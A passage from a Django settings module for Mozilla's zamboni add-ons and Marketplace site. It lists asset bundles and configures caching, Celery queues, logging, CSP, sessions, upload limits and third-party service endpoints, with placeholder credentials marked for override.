            'css/zamboni/tabs.css',
            'css/impala/formset.less',
            'css/impala/suggestions.less',
            'css/impala/header.less',
            'css/impala/moz-tab.css',
            'css/impala/footer.less',
            'css/impala/faux-zamboni.less',
            'css/impala/collection-stats.less',
        ),
        'zamboni/impala': (
            'css/impala/base.css',
            'css/legacy/jquery-lightbox.css',
            'css/impala/site.less',
            'css/impala/typography.less',
            'css/global/headerfooter.css',
            'css/impala/forms.less',
            'css/common/invisible-upload.less',
            'css/impala/header.less',
            'css/impala/footer.less',
            'css/impala/moz-tab.css',
            'css/impala/hovercards.less',
            'css/impala/toplist.less',
            'css/impala/reviews.less',
            'css/impala/buttons.less',
            'css/impala/addon_details.less',
            'css/impala/policy.less',
            'css/impala/expando.less',
            'css/impala/popups.less',
            'css/impala/l10n.less',
            'css/impala/contributions.less',
            'css/impala/lightbox.less',
            'css/impala/prose.less',
            'css/impala/abuse.less',
            'css/impala/paginator.less',
            'css/impala/listing.less',
            'css/impala/versions.less',
            'css/impala/users.less',
            'css/impala/collections.less',
            'css/impala/tooltips.less',
            'css/impala/search.less',
            'css/impala/suggestions.less',
            'css/impala/colorpicker.less',
            'css/impala/login.less',
            'css/impala/dictionaries.less',
            'css/impala/apps.less',
            'css/impala/formset.less',
            'css/impala/tables.less',
        ),
        'zamboni/mobile': (
            'css/zamboni/mobile.css',
            'css/mobile/typography.less',
            'css/mobile/forms.less',
            'css/mobile/header.less',
            'css/mobile/search.less',
            'css/mobile/listing.less',
            'css/mobile/footer.less',
        ),
        'zamboni/admin': (
            'css/zamboni/admin-django.css',
            'css/zamboni/admin-mozilla.css',
            'css/zamboni/admin_features.css',
            # Datepicker styles and jQuery UI core.
            'css/zamboni/jquery-ui/custom-1.7.2.css',
        ),
    },
    'js': {
        # JS files common to the entire site (pre-impala).
        'common': (
            'js/lib/jquery-1.6.4.js',
            'js/lib/underscore.js',
            'js/zamboni/browser.js',
            'js/zamboni/init.js',
            'js/impala/capabilities.js',
            'js/lib/format.js',
            'js/lib/jquery.cookie.js',
            'js/zamboni/storage.js',
            'js/zamboni/apps.js',
            'js/zamboni/buttons.js',
            'js/zamboni/tabs.js',
            'js/common/keys.js',
            # jQuery UI
            'js/lib/jquery-ui/jquery.ui.core.js',
            'js/lib/jquery-ui/jquery.ui.position.js',
            'js/lib/jquery-ui/jquery.ui.widget.js',
            'js/lib/jquery-ui/jquery.ui.mouse.js',
            'js/lib/jquery-ui/jquery.ui.autocomplete.js',
            'js/lib/jquery-ui/jquery.ui.datepicker.js',
            'js/lib/jquery-ui/jquery.ui.sortable.js',
            'js/zamboni/helpers.js',
            'js/zamboni/global.js',
            'js/common/ratingwidget.js',
            'js/lib/jquery-ui/jqModal.js',
            'js/zamboni/l10n.js',
            'js/zamboni/debouncer.js',
            # Homepage
            'js/zamboni/homepage.js',
            # Add-ons details page
            'js/lib/jquery-ui/ui.lightbox.js',
            'js/zamboni/addon_details.js',
            'js/impala/abuse.js',
            'js/zamboni/reviews.js',
            # Users
            'js/zamboni/users.js',
            # Fix-up outgoing links
            'js/zamboni/outgoing_links.js',
            # Hover delay for global header
            'js/global/menu.js',
            # Password length and strength
            'js/zamboni/password-strength.js',
            # Search suggestions
            'js/impala/forms.js',
            'js/impala/ajaxcache.js',
            'js/impala/suggestions.js',
            'js/impala/site_suggestions.js',
        ),
        # Impala and Legacy: Things to be loaded at the top of the page
        'preload': (
            'js/lib/jquery-1.6.4.js',
            'js/impala/preloaded.js',
            'js/zamboni/analytics.js',
        ),
        # Impala: Things to be loaded at the bottom
        'impala': (
            'js/lib/underscore.js',
            'js/zamboni/browser.js',
            'js/zamboni/init.js',
            'js/impala/capabilities.js',
            'js/lib/format.js',
            'js/lib/jquery.cookie.js',
            'js/zamboni/storage.js',
            'js/zamboni/apps.js',
            'js/zamboni/buttons.js',
            'js/lib/jquery.pjax.js',
            'js/impala/footer.js',
            'js/common/keys.js',
            # BrowserID
            'js/zamboni/browserid_support.js',
            # jQuery UI
            'js/lib/jquery-ui/jquery.ui.core.js',
            'js/lib/jquery-ui/jquery.ui.position.js',
            'js/lib/jquery-ui/jquery.ui.widget.js',
            'js/lib/jquery-ui/jquery.ui.mouse.js',
            'js/lib/jquery-ui/jquery.ui.autocomplete.js',
            'js/lib/jquery-ui/jquery.ui.datepicker.js',
            'js/lib/jquery-ui/jquery.ui.sortable.js',
            'js/lib/truncate.js',
            'js/zamboni/truncation.js',
            'js/impala/ajaxcache.js',
            'js/zamboni/helpers.js',
            'js/zamboni/global.js',
            'js/lib/stick.js',
            'js/impala/global.js',
            'js/common/ratingwidget.js',
            'js/lib/jquery-ui/jqModal.js',
            'js/zamboni/l10n.js',
            'js/impala/forms.js',
            # Homepage
            'js/impala/homepage.js',
            # Add-ons details page
            'js/lib/jquery-ui/ui.lightbox.js',
            'js/impala/addon_details.js',
            'js/impala/abuse.js',
            'js/impala/reviews.js',
            # Browse listing pages
            'js/impala/listing.js',
            # Collections
            'js/impala/collections.js',
            # Users
            'js/zamboni/users.js',
            'js/impala/users.js',
            # Search
            'js/impala/serializers.js',
            'js/impala/search.js',
            'js/impala/suggestions.js',
            'js/impala/site_suggestions.js',
            # Login
            'js/impala/login.js',
            # Fix-up outgoing links
            'js/zamboni/outgoing_links.js',
        ),
        'zamboni/files': (
            'js/lib/diff_match_patch_uncompressed.js',
            'js/lib/syntaxhighlighter/xregexp-min.js',
            'js/lib/syntaxhighlighter/shCore.js',
            'js/lib/syntaxhighlighter/shLegacy.js',
            'js/lib/syntaxhighlighter/shBrushAppleScript.js',
            'js/lib/syntaxhighlighter/shBrushAS3.js',
            'js/lib/syntaxhighlighter/shBrushBash.js',
            'js/lib/syntaxhighlighter/shBrushCpp.js',
            'js/lib/syntaxhighlighter/shBrushCSharp.js',
            'js/lib/syntaxhighlighter/shBrushCss.js',
            'js/lib/syntaxhighlighter/shBrushDiff.js',
            'js/lib/syntaxhighlighter/shBrushJava.js',
            'js/lib/syntaxhighlighter/shBrushJScript.js',
            'js/lib/syntaxhighlighter/shBrushPhp.js',
            'js/lib/syntaxhighlighter/shBrushPlain.js',
            'js/lib/syntaxhighlighter/shBrushPython.js',
            'js/lib/syntaxhighlighter/shBrushSass.js',
            'js/lib/syntaxhighlighter/shBrushSql.js',
            'js/lib/syntaxhighlighter/shBrushVb.js',
            'js/lib/syntaxhighlighter/shBrushXml.js',
            'js/zamboni/storage.js',
            'js/zamboni/files.js',
        ),
        'zamboni/mobile': (
            'js/lib/jquery-1.6.4.js',
            'js/lib/underscore.js',
            'js/lib/jqmobile.js',
            'js/lib/jquery.cookie.js',
            'js/zamboni/apps.js',
            'js/zamboni/browser.js',
            'js/zamboni/init.js',
            'js/impala/capabilities.js',
            'js/lib/format.js',
            'js/zamboni/mobile/buttons.js',
            'js/lib/truncate.js',
            'js/zamboni/truncation.js',
            'js/impala/footer.js',
            'js/zamboni/helpers.js',
            'js/zamboni/mobile/general.js',
            'js/common/ratingwidget.js',
            'js/zamboni/browserid_support.js',
        ),
        'zamboni/admin': (
            'js/zamboni/admin.js',
            'js/zamboni/admin_features.js',
            'js/zamboni/admin_validation.js',
        ),
        # This is included when DEBUG is True. Bundle in <head>.
        'debug': (
            'js/debug/less_setup.js',
            'js/lib/less.js',
            'js/debug/less_live.js',
        ),
    }
}
# Caching
# Prefix for cache keys (will prevent collisions when running parallel copies)
# NOTE(review): build_id is defined earlier in this file (outside this chunk);
# keying the prefix on it invalidates caches on every deploy.
CACHE_PREFIX = 'amo:%s:' % build_id
KEY_PREFIX = CACHE_PREFIX
FETCH_BY_ID = True
# Number of seconds a count() query should be cached. Keep it short because
# it's not possible to invalidate these queries.
CACHE_COUNT_TIMEOUT = 60
# To enable pylibmc compression (in bytes)
PYLIBMC_MIN_COMPRESS_LEN = 0  # disabled
# External tools.
JAVA_BIN = '/usr/bin/java'
# Add-on download settings.
MIRROR_URL = 'http://releases.mozilla.org/pub/mozilla.org/addons'
LOCAL_MIRROR_URL = 'https://static.addons.mozilla.net/_files'
PRIVATE_MIRROR_URL = '/_privatefiles'
# File paths
ADDON_ICONS_PATH = UPLOADS_PATH + '/addon_icons'
COLLECTIONS_ICON_PATH = UPLOADS_PATH + '/collection_icons'
FEATURED_APP_BG_PATH = UPLOADS_PATH + '/featured_app_background'
PREVIEWS_PATH = UPLOADS_PATH + '/previews'
IMAGEASSETS_PATH = UPLOADS_PATH + '/imageassets'
REVIEWER_ATTACHMENTS_PATH = UPLOADS_PATH + '/reviewer_attachment'
USERPICS_PATH = UPLOADS_PATH + '/userpics'
ADDON_ICONS_DEFAULT_PATH = os.path.join(MEDIA_ROOT, 'img/addon-icons')
CA_CERT_BUNDLE_PATH = os.path.join(ROOT, 'apps/amo/certificates/roots.pem')
PREVIEW_THUMBNAIL_PATH = PREVIEWS_PATH + '/thumbs/%s/%d.png'
PREVIEW_FULL_PATH = PREVIEWS_PATH + '/full/%s/%d.%s'
# URL paths
# paths for images, e.g. mozcdn.com/amo or '/static'
STATIC_URL = SITE_URL + '/'
ADDON_ICONS_DEFAULT_URL = MEDIA_URL + '/img/addon-icons'
ADDON_ICON_BASE_URL = MEDIA_URL + 'img/icons/'
ADDON_ICON_URL = (STATIC_URL +
                  'img/uploads/addon_icons/%s/%s-%s.png?modified=%s')
PREVIEW_THUMBNAIL_URL = (STATIC_URL +
                         'img/uploads/previews/thumbs/%s/%d.png?modified=%d')
PREVIEW_FULL_URL = (STATIC_URL +
                    'img/uploads/previews/full/%s/%d.%s?modified=%d')
USERPICS_URL = STATIC_URL + 'img/uploads/userpics/%s/%s/%s.png?modified=%d'
# paths for uploaded extensions
COLLECTION_ICON_URL = (STATIC_URL +
                       'img/uploads/collection_icons/%s/%s.png?m=%s')
NEW_PERSONAS_IMAGE_URL = STATIC_URL + 'img/uploads/themes/%(id)d/%(file)s'
PERSONAS_IMAGE_URL = ('http://getpersonas.cdn.mozilla.net/static/'
                      '%(tens)d/%(units)d/%(id)d/%(file)s')
PERSONAS_IMAGE_URL_SSL = ('https://getpersonas.cdn.mozilla.net/static/'
                          '%(tens)d/%(units)d/%(id)d/%(file)s')
PERSONAS_UPDATE_URL = 'https://www.getpersonas.com/update_check/%d'
VAMO_URL = 'https://versioncheck.addons.mozilla.org'
NEW_PERSONAS_UPDATE_URL = VAMO_URL + '/%(locale)s/themes/update-check/%(id)d'
# Outgoing URL bouncer
REDIRECT_URL = 'http://outgoing.mozilla.org/v1/'
REDIRECT_SECRET_KEY = ''
PFS_URL = 'https://pfs.mozilla.org/plugins/PluginFinderService.php'
# Allow URLs from these servers. Use full domain names.
REDIRECT_URL_WHITELIST = ['addons.mozilla.org']
# Default to short expiration; check "remember me" to override
SESSION_ENGINE = 'django.contrib.sessions.backends.signed_cookies'
SESSION_EXPIRE_AT_BROWSER_CLOSE = True
SESSION_COOKIE_AGE = 1209600
SESSION_COOKIE_SECURE = True
SESSION_COOKIE_HTTPONLY = True
SESSION_COOKIE_DOMAIN = ".%s" % DOMAIN  # bug 608797
MESSAGE_STORAGE = 'django.contrib.messages.storage.cookie.CookieStorage'
# These should have app+locale at the start to avoid redirects
LOGIN_URL = "/users/login"
LOGOUT_URL = "/users/logout"
LOGIN_REDIRECT_URL = "/"
LOGOUT_REDIRECT_URL = "/"
# When logging in with browser ID, a username is created automatically.
# In the case of duplicates, the process is recursive up to this number
# of times.
MAX_GEN_USERNAME_TRIES = 50
# Email settings
ADDONS_EMAIL = "Mozilla Add-ons <[email protected]>"
DEFAULT_FROM_EMAIL = ADDONS_EMAIL
# Email goes to the console by default. s/console/smtp/ for regular delivery
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
# Please use all lowercase for the blacklist.
EMAIL_BLACKLIST = (
    '[email protected]',
)
# URL for Add-on Validation FAQ.
VALIDATION_FAQ_URL = ('https://wiki.mozilla.org/AMO:Editors/EditorGuide/'
                      'AddonReviews#Step_2:_Automatic_validation')
## Celery
BROKER_URL = 'amqp://zamboni:zamboni@localhost:5672/zamboni'
BROKER_CONNECTION_TIMEOUT = 0.1
CELERY_RESULT_BACKEND = 'amqp'
CELERY_IGNORE_RESULT = True
CELERY_SEND_TASK_ERROR_EMAILS = True
CELERYD_HIJACK_ROOT_LOGGER = False
CELERY_IMPORTS = ('lib.video.tasks', 'lib.metrics',
                  'lib.es.management.commands.reindex_mkt')
# We have separate celeryds for processing devhub & images as fast as possible
# Some notes:
# - always add routes here instead of @task(queue=<name>)
# - when adding a queue, be sure to update deploy.py so that it gets restarted
CELERY_ROUTES = {
    # Priority.
    # If your tasks need to be run as soon as possible, add them here so they
    # are routed to the priority queue.
    'lib.crypto.packaged.sign': {'queue': 'priority'},
    'mkt.inapp_pay.tasks.fetch_product_image': {'queue': 'priority'},
    'mkt.webapps.tasks.index_webapps': {'queue': 'priority'},
    'mkt.webapps.tasks.unindex_webapps': {'queue': 'priority'},
    'stats.tasks.update_monolith_stats': {'queue': 'priority'},
    'versions.tasks.update_supported_locales_single': {'queue': 'priority'},
    # Other queues we prioritize below.
    # MKT Devhub.
    'mkt.developers.tasks.validator': {'queue': 'devhub'},
    'mkt.developers.tasks.file_validator': {'queue': 'devhub'},
    'mkt.developers.tasks.resize_icon': {'queue': 'devhub'},
    'mkt.developers.tasks.resize_preview': {'queue': 'devhub'},
    'mkt.developers.tasks.fetch_icon': {'queue': 'devhub'},
    'mkt.developers.tasks.fetch_manifest': {'queue': 'devhub'},
    # Videos.
    'lib.video.tasks.resize_video': {'queue': 'devhub'},
    # Images.
    'mkt.webapps.tasks.regenerate_icons_and_thumbnails': {'queue': 'images'},
    # Comm.
    'mkt.comm.tasks.migrate_activity_log': {'queue': 'limited'},
}
# This is just a place to store these values, you apply them in your
# task decorator, for example:
# @task(time_limit=CELERY_TIME_LIMITS['lib...']['hard'])
# Otherwise your task will use the default settings.
CELERY_TIME_LIMITS = {
    'lib.video.tasks.resize_video': {'soft': 360, 'hard': 600},
    'lib.es.management.commands.reindex_mkt.run_indexing': {
        'soft': 60 * 20,  # 20 mins to reindex.
        'hard': 60 * 120,  # 120 mins hard limit.
    },
}
# When testing, we always want tasks to raise exceptions. Good for sanity.
CELERY_EAGER_PROPAGATES_EXCEPTIONS = True
# Time in seconds before celery.exceptions.SoftTimeLimitExceeded is raised.
# The task can catch that and recover but should exit ASAP. Note that there is
# a separate, shorter timeout for validation tasks.
CELERYD_TASK_SOFT_TIME_LIMIT = 60 * 2
## Fixture Magic
CUSTOM_DUMPS = {
    'addon': {  # ./manage.py custom_dump addon id
        'primary': 'addons.addon',  # This is our reference model.
        'dependents': [  # These are items we wish to dump.
            # Magic turns this into current_version.files.all()[0].
            'current_version.files.all.0',
            'current_version.apps.all.0',
            'addonuser_set.all.0',
        ],
        'order': ('applications.application', 'translations.translation',
                  'addons.addontype', 'files.platform', 'addons.addon',
                  'versions.license', 'versions.version', 'files.file'),
        'excludes': {
            'addons.addon': ('_current_version',),
        }
    }
}
## Hera (http://github.com/clouserw/hera)
HERA = [{'USERNAME': '',
         'PASSWORD': '',
         'LOCATION': '',
         }]
# Logging
LOG_LEVEL = logging.DEBUG
HAS_SYSLOG = True  # syslog is used if HAS_SYSLOG and NOT DEBUG.
SYSLOG_TAG = "http_app_addons"
SYSLOG_TAG2 = "http_app_addons2"
# See PEP 391 and log_settings.py for formatting help. Each section of
# LOGGING will get merged into the corresponding section of
# log_settings.py. Handlers and log levels are set up automatically based
# on LOG_LEVEL and DEBUG unless you set them here. Messages will not
# propagate through a logger unless propagate: True is set.
LOGGING_CONFIG = None
LOGGING = {
    'loggers': {
        'amqplib': {'handlers': ['null']},
        'caching.invalidation': {'handlers': ['null']},
        'caching': {'level': logging.WARNING},
        'suds': {'handlers': ['null']},
        'z.task': {'level': logging.INFO},
        'z.es': {'level': logging.INFO},
        'z.heka': {'level': logging.INFO},
        's.client': {'level': logging.INFO},
        'nose': {'level': logging.WARNING},
    },
}
HEKA_CONF = {
    'logger': 'zamboni',
    'plugins': {
        'cef': ('heka_cef.cef_plugin:config_plugin', {
            'syslog_facility': 'LOCAL4',
            'syslog_ident': 'http_app_addons_marketplace',
            'syslog_priority': 'ALERT',
        }),
        # Sentry accepts messages over UDP, you'll need to
        # configure this URL so that logstash can relay the message
        # properly
        'raven': ('heka_raven.raven_plugin:config_plugin',
                  {'dsn': 'udp://username:[email protected]:9000/2'}),
    },
    'stream': {
        'class': 'heka.streams.UdpStream',
        'host': '127.0.0.1',
        'port': 5565,
    },
}
HEKA = client_from_dict_config(HEKA_CONF)
USE_HEKA_FOR_CEF = False
USE_HEKA_FOR_TASTYPIE = False
CEF_PRODUCT = "amo"
# CSP Settings
CSP_REPORT_URI = '/services/csp/report'
CSP_POLICY_URI = '/services/csp/policy?build=%s' % build_id
CSP_REPORT_ONLY = True
CSP_ALLOW = ("'self'",)
CSP_IMG_SRC = ("'self'", SITE_URL,
               "https://ssl.google-analytics.com",
               "https://www.google-analytics.com",
               "https://*.newrelic.com",
               "data:"
               )
CSP_SCRIPT_SRC = ("'self'", SITE_URL,
                  "https://login.persona.org",
                  "https://firefoxos.persona.org",
                  "https://ssl.google-analytics.com",
                  "https://www.google-analytics.com",
                  "https://*.newrelic.com",
                  )
CSP_STYLE_SRC = ("'self'", SITE_URL,
                 )
CSP_OBJECT_SRC = ("'none'",)
CSP_MEDIA_SRC = ("'none'",)
CSP_FRAME_SRC = ("https://s3.amazonaws.com",
                 "https://ssl.google-analytics.com",
                 "https://login.persona.org",
                 "https://firefoxos.persona.org",
                 "https://www.youtube.com",
                 )
CSP_FONT_SRC = ("'self'", "fonts.mozilla.org", "www.mozilla.org",)
# Should robots.txt deny everything or disallow a calculated list of URLs we
# don't want to be crawled? Default is false, disallow everything.
# Also see http://www.google.com/support/webmasters/bin/answer.py?answer=93710
ENGAGE_ROBOTS = False
# Read-only mode setup.
READ_ONLY = False
# Turn on read-only mode in settings_local.py by putting this line
# at the VERY BOTTOM: read_only_mode(globals())
def read_only_mode(env):
    """Flip a settings namespace (usually globals()) into read-only mode.

    Sets READ_ONLY, points the default database at the first slave
    connection, and inserts the read-only middleware just before the CSRF
    middleware.  Raises if no slave database is configured.
    """
    env['READ_ONLY'] = True

    # Replace the default (master) db with a slave connection.
    slaves = env.get('SLAVE_DATABASES')
    if not slaves:
        raise Exception("We need at least one slave database.")
    env['DATABASES']['default'] = env['DATABASES'][slaves[0]]

    # Add in the read-only middleware before csrf middleware.
    middleware = list(env['MIDDLEWARE_CLASSES'])
    csrf_position = middleware.index('session_csrf.CsrfMiddleware')
    middleware.insert(csrf_position, 'amo.middleware.ReadOnlyMiddleware')
    env['MIDDLEWARE_CLASSES'] = tuple(middleware)
# Uploaded file limits
MAX_ICON_UPLOAD_SIZE = 4 * 1024 * 1024
MAX_IMAGE_UPLOAD_SIZE = 4 * 1024 * 1024
MAX_VIDEO_UPLOAD_SIZE = 4 * 1024 * 1024
MAX_PHOTO_UPLOAD_SIZE = MAX_ICON_UPLOAD_SIZE
MAX_PERSONA_UPLOAD_SIZE = 300 * 1024
MAX_REVIEW_ATTACHMENT_UPLOAD_SIZE = 5 * 1024 * 1024
MAX_WEBAPP_UPLOAD_SIZE = 2 * 1024 * 1024
# RECAPTCHA - copy all three statements to settings_local.py
RECAPTCHA_PUBLIC_KEY = ''
RECAPTCHA_PRIVATE_KEY = ''
# NOTE(review): built at import time, so overriding RECAPTCHA_PUBLIC_KEY in
# settings_local must happen before this module is evaluated (hence "copy all
# three statements" above).
RECAPTCHA_URL = ('https://www.google.com/recaptcha/api/challenge?k=%s' %
                 RECAPTCHA_PUBLIC_KEY)
RECAPTCHA_AJAX_URL = (
    'https://www.google.com/recaptcha/api/js/recaptcha_ajax.js')
# Send Django signals asynchronously on a background thread.
ASYNC_SIGNALS = True
REDIS_BACKENDS = {'master': 'redis://localhost:6379?socket_timeout=0.5'}
# Full path or executable path (relative to $PATH) of the spidermonkey js
# binary. It must be a version compatible with amo-validator
SPIDERMONKEY = None
VALIDATE_ADDONS = True
# Number of seconds before celery tasks will abort addon validation:
VALIDATOR_TIMEOUT = 110
# When True include full tracebacks in JSON. This is useful for QA on preview.
EXPOSE_VALIDATOR_TRACEBACKS = False
# Max number of warnings/errors to show from validator. Set to None for no
# limit.
VALIDATOR_MESSAGE_LIMIT = 500
# Feature flags
UNLINK_SITE_STATS = True
# Set to True if we're allowed to use X-SENDFILE.
XSENDFILE = True
XSENDFILE_HEADER = 'X-SENDFILE'
MOBILE_COOKIE = 'mamo'
# If the users's Firefox has a version number greater than this we consider it
# a beta.
MIN_BETA_VERSION = '3.7'
DEFAULT_SUGGESTED_CONTRIBUTION = 5
# Path to `ps`.
PS_BIN = '/bin/ps'
# The maximum file size that is shown inside the file viewer.
FILE_VIEWER_SIZE_LIMIT = 1048576
# The maximum file size that you can have inside a zip file.
FILE_UNZIP_SIZE_LIMIT = 104857600
# How long to delay tasks relying on file system to cope with NFS lag.
NFS_LAG_DELAY = 3
# A whitelist of domains that the authentication script will redirect to upon
# successfully logging in or out.
VALID_LOGIN_REDIRECTS = {
    'builder': 'https://builder.addons.mozilla.org',
    'builderstage': 'https://builder-addons.allizom.org',
    'buildertrunk': 'https://builder-addons-dev.allizom.org',
}
# Secret key we send to builder so we can trust responses from the builder.
BUILDER_SECRET_KEY = 'love will tear us apart'
# The builder URL we hit to upgrade jetpacks.
BUILDER_UPGRADE_URL = 'https://addons.mozilla.org/services/builder'
BUILDER_VERSIONS_URL = ('https://builder.addons.mozilla.org/repackage/' +
                        'sdk-versions/')
## elasticsearch
ES_HOSTS = ['127.0.0.1:9200']
ES_URLS = ['http://%s' % h for h in ES_HOSTS]
ES_INDEXES = {'webapp': 'apps'}
ES_TIMEOUT = 30
ES_DEFAULT_NUM_REPLICAS = 2
ES_DEFAULT_NUM_SHARDS = 5
ES_USE_PLUGINS = False
# Default AMO user id to use for tasks.
TASK_USER_ID = 4757633
# If this is False, tasks and other jobs that send non-critical emails should
# use a fake email backend.
SEND_REAL_EMAIL = False
STATSD_HOST = 'localhost'
STATSD_PORT = 8125
STATSD_PREFIX = 'amo'
# The django statsd client to use, see django-statsd for more.
STATSD_CLIENT = 'django_statsd.clients.normal'
GRAPHITE_HOST = 'localhost'
GRAPHITE_PORT = 2003
GRAPHITE_PREFIX = 'amo'
GRAPHITE_TIMEOUT = 1
# IP addresses of servers we use as proxies.
KNOWN_PROXIES = []
# Blog URL
DEVELOPER_BLOG_URL = 'http://blog.mozilla.com/addons/feed/'
LOGIN_RATELIMIT_USER = 5
LOGIN_RATELIMIT_ALL_USERS = '15/m'
# The verification URL, the addon id will be appended to this. This will
# have to be altered to the right domain for each server, eg:
# https://receiptcheck.addons.mozilla.org/verify/
WEBAPPS_RECEIPT_URL = '%s/verify/' % SITE_URL
# The key we'll use to sign webapp receipts.
WEBAPPS_RECEIPT_KEY = ''
# The expiry that we will add into the receipt.
# Set to 6 months for the next little while.
WEBAPPS_RECEIPT_EXPIRY_SECONDS = 60 * 60 * 24 * 182
# Send a new receipt back when it expires.
WEBAPPS_RECEIPT_EXPIRED_SEND = False
CSRF_FAILURE_VIEW = 'amo.views.csrf_failure'
# Testing responsiveness without rate limits.
CELERY_DISABLE_RATE_LIMITS = True
# Temporary variables for the app-preview server, set this to True
# if you want to experience app-preview.mozilla.org.
APP_PREVIEW = False
# Name of view to use for homepage. AMO uses this. Marketplace has its own.
HOME = 'addons.views.home'
# Default file storage mechanism that holds media.
DEFAULT_FILE_STORAGE = 'amo.utils.LocalFileStorage'
# Defined in the site, this is to allow settings patch to work for tests.
NO_ADDONS_MODULES = ()
# Where to find ffmpeg and totem if it's not in the PATH.
FFMPEG_BINARY = 'ffmpeg'
TOTEM_BINARIES = {'thumbnailer': 'totem-video-thumbnailer',
                  'indexer': 'totem-video-indexer'}
VIDEO_LIBRARIES = ['lib.video.totem', 'lib.video.ffmpeg']
# Turn on/off the use of the signing server and all the related things. This
# is a temporary flag that we will remove.
SIGNING_SERVER_ACTIVE = False
# This is the signing REST server for signing receipts.
SIGNING_SERVER = ''
# And how long we'll give the server to respond.
SIGNING_SERVER_TIMEOUT = 10
# The domains that we will accept certificate issuers for receipts.
SIGNING_VALID_ISSUERS = []
# True when the Django app is running from the test suite.
IN_TEST_SUITE = False
# Until bug 753421 gets fixed, we're skipping ES tests. Sad times. I know.
# Flip this on in your local settings to experience the joy of ES tests.
RUN_ES_TESTS = False
# The configuration for the client that speaks to solitude.
# A tuple of the solitude hosts.
SOLITUDE_HOSTS = ('',)
# The oAuth key and secret that solitude needs.
SOLITUDE_KEY = ''
SOLITUDE_SECRET = ''
# The timeout we'll give solitude.
SOLITUDE_TIMEOUT = 10
# The OAuth keys to connect to the solitude host specified above.
SOLITUDE_OAUTH = {'key': '', 'secret': ''}
# Temporary flag to work with navigator.mozPay() on devices that don't
# support it natively.
SIMULATE_NAV_PAY = False
# When the dev. agreement gets updated and you need users to re-accept it
# change this date. You won't want to do this for minor format changes.
# The tuple is passed through to datetime.date, so please use a valid date
# tuple. If the value is None, then it will just not be used at all.
DEV_AGREEMENT_LAST_UPDATED = None
# If you want to allow self-reviews for add-ons/apps, then enable this.
# In production we do not want to allow this.
ALLOW_SELF_REVIEWS = False
# Modify the user-agents we check for in django-mobility
# (Android has since changed its user agent).
MOBILE_USER_AGENTS = ('mozilla.+mobile|android|fennec|iemobile|'
                      'iphone|opera (?:mini|mobi)')
#Credentials for accessing Google Analytics stats.
GOOGLE_ANALYTICS_CREDENTIALS = {}
#Which domain to access GA stats for. If not set, defaults to DOMAIN.
GOOGLE_ANALYTICS_DOMAIN = None
# Used for general web API access.
GOOGLE_API_CREDENTIALS = ''
# Google translate settings.
GOOGLE_TRANSLATE_API_URL = 'https://www.googleapis.com/language/translate/v2'
GOOGLE_TRANSLATE_REDIRECT_URL = (
    'https://translate.google.com/#auto/{lang}/{text}')
# Domain to allow cross-frame requests from for privacy policy and TOS.
BROWSERID_DOMAIN = 'login.persona.org'
# Adjust these settings if you need to use a custom verifier.
BROWSERID_VERIFICATION_URL = 'https://verifier.login.persona.org/verify'
BROWSERID_JS_URL = 'https://login.persona.org/include.js'
# The issuer for unverified Persona email addresses.
# We only trust one issuer to grant us unverified emails.
# If UNVERIFIED_ISSUER is set to None, forceIssuer will not
# be sent to the client or the verifier.
NATIVE_BROWSERID_DOMAIN = 'firefoxos.persona.org'
UNVERIFIED_ISSUER = 'firefoxos.persona.org'
# This is a B2G (or other native) verifier. Adjust accordingly.
NATIVE_BROWSERID_VERIFICATION_URL = ('https://%s/verify'
                                     % NATIVE_BROWSERID_DOMAIN)
NATIVE_BROWSERID_JS_URL = ('https://%s/include.js'
                           % NATIVE_BROWSERID_DOMAIN)
# These domains get `x-frame-options: allow-from` for Privacy Policy / TOS.
LEGAL_XFRAME_ALLOW_FROM = [
    BROWSERID_DOMAIN,
    UNVERIFIED_ISSUER,
    'fxos.login.persona.org',
]
# Language pack fetcher settings
LANGPACK_OWNER_EMAIL = '[email protected]'
LANGPACK_DOWNLOAD_BASE = 'https://ftp.mozilla.org/pub/mozilla.org/'
LANGPACK_PATH_DEFAULT = '%s/releases/%s/win32/xpi/'
# E.g. https://ftp.mozilla.org/pub/mozilla.org/firefox/releases/23.0/SHA512SUMS
LANGPACK_MANIFEST_PATH = '../../SHA512SUMS'
LANGPACK_MAX_SIZE = 5 * 1024 * 1024  # 5MB should be more than enough
# Basket subscription url for newsletter signups
BASKET_URL = 'https://basket.mozilla.com'
# This saves us when we upgrade jingo-minify (jsocol/jingo-minify@916b054c).
JINGO_MINIFY_USE_STATIC = False
# Monolith settings.
MONOLITH_SERVER = None
MONOLITH_INDEX = 'time_*'
MONOLITH_MAX_DATE_RANGE = 365
# Error generation service. Should *not* be on in production.
ENABLE_API_ERROR_SERVICE = False
# The version we append to the app feature profile. Bump when we add new app
# features to the `AppFeatures` model.
APP_FEATURES_VERSION = 4
# Whether to throttle API requests. Default is True. Disable where appropriate.
API_THROTTLE = True
# Cache timeout on the /search/featured API.
CACHE_SEARCH_FEATURED_API_TIMEOUT = 60 * 60  # 1 hour.
# Whitelist IP addresses of the allowed clients that can post email
# through the API.
WHITELISTED_CLIENTS_EMAIL_API = []
# Base URL to the Bango Vendor Portal (keep the trailing question mark).
BANGO_BASE_PORTAL_URL = 'http://mozilla.com.test.bango.org/login/al.aspx?'
# URL to Boku signup flow, this will change per server.
# See https://mana.mozilla.org/wiki/display/MARKET/Boku for more.
#
# This a good test one that developers can use.
BOKU_SIGNUP_URL = 'https://merchants.boku.com/signup/signup_business?params=jEHWaTM7zm5cbPpheT2iS4xB1mkzO85uxVAo7rs7LVgy5JYGMWnUYDvxyEk8lxalYW56b6hrqfw%3D'
BOKU_PORTAL = 'https://merchants.boku.com/merchant_product_statistics'
# Auth token required to authorize a postfix host.
POSTFIX_AUTH_TOKEN = 'make-sure-to-override-this-with-a-long-weird-string'
# Domain name of the postfix server.
POSTFIX_DOMAIN = 'marketplace.firefox.com'
# This is a sample AES_KEY, we will override this on each server.
AES_KEYS = {
    'api:access:secret': os.path.join(ROOT, 'mkt/api/sample-aes.key'),
}
# IARC content ratings.
IARC_ENV = 'test'
IARC_MOCK = False
IARC_PASSWORD = ''
IARC_PLATFORM = 'Firefox'
IARC_SERVICE_ENDPOINT = 'https://www.globalratings.com/IARCDEMOService/IARCServices.svc'
IARC_STOREFRONT_ID = 4
IARC_SUBMISSION_ENDPOINT = 'https://www.globalratings.com/IARCDEMORating/Submission.aspx'
IARC_PRIVACY_URL = 'https://www.globalratings.com/IARCPRODClient/privacypolicy.aspx'
IARC_TOS_URL = 'https://www.globalratings.com/IARCPRODClient/termsofuse.aspx'
IARC_ALLOW_CERT_REUSE = False
# The payment providers supported.
